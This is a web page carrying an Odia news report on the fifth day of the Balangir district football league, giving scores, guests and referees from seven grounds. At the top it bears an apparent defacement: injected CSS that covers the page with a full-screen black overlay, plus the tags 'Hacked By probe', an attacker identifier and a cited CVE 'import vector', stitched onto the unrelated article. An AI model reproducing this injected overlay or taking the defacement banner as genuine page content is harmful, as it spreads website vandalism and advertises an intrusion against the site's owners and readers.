html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ଫୂଟବଲ  ଲିଗ୍ ପଂଚମଦିନରେ, ଜମୁଛି ମ୍ୟାଚ 

User Rating: 2 / 5

Star ActiveStar ActiveStar InactiveStar InactiveStar Inactive
 

ବଲାଙ୍ଗିର,(ନିରୋଜ ମିଶ୍ର)- ବଲାଙ୍ଗିର ଜିଲ୍ଲା କ୍ରୀଡା ସଂସଦ ତରଫରୁ ଆୟୋଜିତ ବଲାଙ୍ଗିର ଫୁଟବଲ ଲିଗ ୭ ଗୋଟି ପଡିଆରେ ଅନୁଷ୍ଠିତ ହୋଇଯାଇଛି । ଖୋଳାନ ପଡିଆରେ ଅଡିନାନ୍ସ ଫେକ୍ଟି୍ର ବଡମାଲ ୩-୨ ଗୋଲରେ ନାରୀକଟା କୁ ହରାଇ ବିଜୟୀ ହେଲା । ଖେଳକୁ ବିନୋଦ ପ୍ରଧାନି, ଆଶିଷ ଦେବ ସା, ମୋହନ ପଧାନି ଓ ଆଶିର୍ବାଦ ସା ପରି·ଲନା କରିଥିଲେ । ଲୋଇସିଂହା ମିନିଷ୍ଟାଡିୟମଠାରେ ଅନୁଷ୍ଠିତ ଖେଳରେ ଏବିଏଫଏ ଲୋଇସିଂହା ଟ୍ରାଇବ୍ରେକର ୪-୨ ଗୋଲରେ କୁଶଙ୍ଗକୁ ହରାଇ ବିଜୟୀ ହେଲା । ଫାଓ ଓଡିଶା ତଥା ଜିଲ୍ଲା କ୍ରୀଡା ସଂସଦର କାର୍ଯ୍ୟକାରୀ ସଭାପତି ଡ. ଶ୍ରୀକର ମିଶ୍ର ଓ ଜିଲ୍ଲାପରିଷଦ ସଭ୍ୟ ସାଇ ଶଙ୍କର ସାହୁ ଅତିଥିଭାବେ ଯୋଗ ଦେଇଥିଲେ । ଖେଳକୁ ଦିଲିପ ଧରୁଆ, ଅଂଜନ ବେଶ୍ରା, ବିଜୟ ରଣା ଓ ପ୍ରଦିପ ବଗତ୍ତୀ ପରି·ଳନା କରିଥିଲେ । ଖୁଜେନପାଲି ପଡିଆରେ ଅନୁଷ୍ଠିତ ଖେଳରେ ଖଲିଆପାଲି ଇଏସ ୧-୦ ଗୋଲରେ ମହିମୁଣ୍ଡା କୁ ହରାଇ ବିଜୟୀ ହେଲା । ଅତିଥିଭାବେ କ୍ରୀଡାବିତ ଦିଲିପ ସେଠ ଓ ପ୍ରଦିପ ତ୍ରିପାଠୀ ଯୋଗଦେଇଥିଲେ । ଖେଳକୁ ଦୋଲ ଗୋବିନ୍ଦ ମୁଣ୍ଡା, ନରସିଂ ସ୍ୱାମୀ ନାଇଡୁ, ପ୍ରଫୁଲ୍ଲ ବଗର୍ତ୍ତୀ ଓ ସଂଜିତ ମହାନ୍ତି ପରିଚାଳନା   କରିଥିଲେ । ଚୁଡାପାଲି ପଡିଆରେ କୁତମୁଣ୍ଡା ୩-୧ ଗୋଲରେ ଚାଣ୍ଟିମୁଣ୍ଡାକୁ ହରାଇ ବିଜୟୀ ହେଲା । ଅତିଥିଭାବେ କ୍ରୀଡାସଂସଦର କୋଷାଧ୍ୟକ୍ଷ ପ୍ରଭାତ କୁମାର ମିଶ୍ର ଯୋଗଦେଇଥିଲେ । ଖେଳକୁ ଦେବରାଜ ନାହାକ, ବୈକୁଣ୍ଠ ଜେନା, ଜଲନ୍ଧର ସାହୁ ଓ ଶରତ ନନ୍ଦ ପରିଚାଳନା  କରିଥିଲେ ।  ପଲ୍ଲିଶ୍ରୀ ଷ୍ଟାଡିୟମ ସଦାଇପାଲି ଠାରେ ଅନୁଷ୍ଠିତ ଖେଳରେ ଅମାମୁଣ୍ଡା ୨-୦ ଗୋଲରେ ଏନ୍ୱାଇଏସ ବରକାନି କୁ ହରାଇ ବିଜୟୀ ହେଲା । ଅତିଥି ଭାବେ ବଲାଙ୍ଗିର ବ୍ଳକ ଅଧ୍ୟକ୍ଷ ଗୋଲାପ ବାଗ ଯୋଗଦେଇଥିଲେ । ଖେଳକୁ ସୁଶାନ୍ତ ନାଗ, ସୁଧାଶୁଂ ସେଠ, ଦେବାଶିଷ ବାଗ ଓ ଇଶ୍ୱର ମଚ୍ଛଖଣ୍ଡ ପରିଚାଳନା କରିଥିଲେ । ଜରାସିଂହା ମିନିଷ୍ଟାଡିୟମ ଠାରେ ଅନୁଷ୍ଠିତ ଖେଳରେ ଜରାସିଂହା ୪-୧ ଗୋଲରେ ସିରାବାହାଲ କୁ ହରାଇ ବିଜୟୀ ହେଲା ଅତିଥିଭାବେ କ୍ରୀଡାବିତ ଚିତରଂଜନ ଥନାପତି ଯୋଗଦେଇଥିଲେ । ଖେଳକୁ କୁନ୍ତେ ମେହେର, ଲକ୍ଷ୍ମିଧର ମହାନ୍ତି । ପ୍ରସାନ୍ତ ଥାନପତି, ଶ୍ରୀବତ୍ସ ମେହେର ପରିଚାଳନା  କରିଥିଲେ । ପାଟଣାଗଡ ପଡିଆରେ ଅନୁଷ୍ଠିତ  ଖେଳରେ ରୁଗୁଡିମୁଣ୍ଡା ଟ୍ରାଇବ୍ରେକର ୪-୩ ଗୋଲରେ ଖୁଣ୍ଟ ସମଲାଇକୁ ହରାଇ ବିଜୟୀ ହେଲା । ଅତିଥିଭାବେ କଂଗ୍ରେସ ଯୁବନେତା ଅନିଲ ମେହେର ଯୋଗଦେଇଥିବା ବେଳେ ଖେଳକୁ ରାଜେନ୍ଦ୍ର ଧରୁଆ, ଦିପକ ରାଜ ହଂସ, ଖୁସିରାମ ମଲ୍ଲିକ, ଚୈତନ୍ୟ ସାହୁ ଓ ରାଜେନ୍ଦ୍ର ସେଠ ପରିଚାଳନା  କରିଥିଲେ । 

 

0
0
0
s2sdefault